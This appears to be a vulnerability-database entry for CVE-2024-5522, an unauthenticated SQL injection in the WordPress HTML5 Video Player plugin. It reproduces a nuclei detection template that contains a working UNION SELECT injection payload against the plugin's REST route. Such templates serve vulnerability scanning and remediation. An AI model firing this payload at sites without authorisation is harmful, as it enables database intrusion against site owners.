Lucene search

WordPress HTML5 Video Player < 2.5.27 - SQL Injection

🗓️ 26 Jun 2024 12:27:25Reported by ProjectDiscoveryType

nuclei🔗 github.com👁 110 Views

WordPress HTML5 Video Player < 2.5.27 - SQL Injection allows unauthenticated users to perform SQL injection attacks. Fixed in 2.5.2

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Reporter	Title	Published	Views	Family All 11
Patchstack	WordPress Flash & HTML5 Video Plugin < 2.5.27 is vulnerable to SQL Injection	31 May 202400:00	–	patchstack
WPVulnDB	HTML5 Video Player < 2.5.27 - Unauthenticated SQLi	30 May 202400:00	–	wpvulndb
GithubExploit	Exploit for SQL Injection in Bplugins Html5 Video Player	11 Sep 202404:46	–	githubexploit
GithubExploit	Exploit for SQL Injection in Bplugins Html5 Video Player	1 Oct 202416:02	–	githubexploit
GithubExploit	Exploit for SQL Injection in Bplugins Html5 Video Player	31 May 202404:41	–	githubexploit
CVE	CVE-2024-5522	20 Jun 202406:15	–	cve
NVD	CVE-2024-5522	20 Jun 202406:15	–	nvd
wpexploit	HTML5 Video Player < 2.5.27 - Unauthenticated SQLi	30 May 202400:00	–	wpexploit
Cvelist	CVE-2024-5522 HTML5 Video Player < 2.5.27 - Unauthenticated SQLi	20 Jun 202406:00	–	cvelist
Vulnrichment	CVE-2024-5522 HTML5 Video Player < 2.5.27 - Unauthenticated SQLi	20 Jun 202406:00	–	vulnrichment

Source	Link
wpscan	www.wpscan.com/vulnerability/bc76ef95-a2a9-4185-8ed9-1059097a506a/
nvd	www.nvd.nist.gov/vuln/detail/CVE-2024-5522

id: CVE-2024-5522

info:
  name: WordPress HTML5 Video Player < 2.5.27 - SQL Injection
  author: JohnDoeAnonITA
  severity: critical
  description: |
    The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
  remediation: Fixed in 2.5.27
  reference:
    - https://wpscan.com/vulnerability/bc76ef95-a2a9-4185-8ed9-1059097a506a/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5522
  classification:
    cvss-score: 9.8
    cwe-id: CWE-89
    cve-id: CVE-2024-5522
    epss-score: 0.04
    epss-percentile: 9
    cpe: cpe:2.3:a:bplugins:html5_video_player:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/html5-video-player"
    product: html5_video_player
    vendor: bplugins
  tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,html5-video-player

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200
# digest: 490a0046304402203bb5193fd1d54bb1edabf5064a4bfa0cbe49768f118c9c3d004f344c4156e82002205d1522f529a47bae6a347083f56f6841cc8a56f90d3f001b0b88ec4d5d6b6f14:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

26 Jun 2024 12:25Current

6.7Medium risk

Vulners AI Score6.7

CVSS36.5

EPSS0.73098

SSVC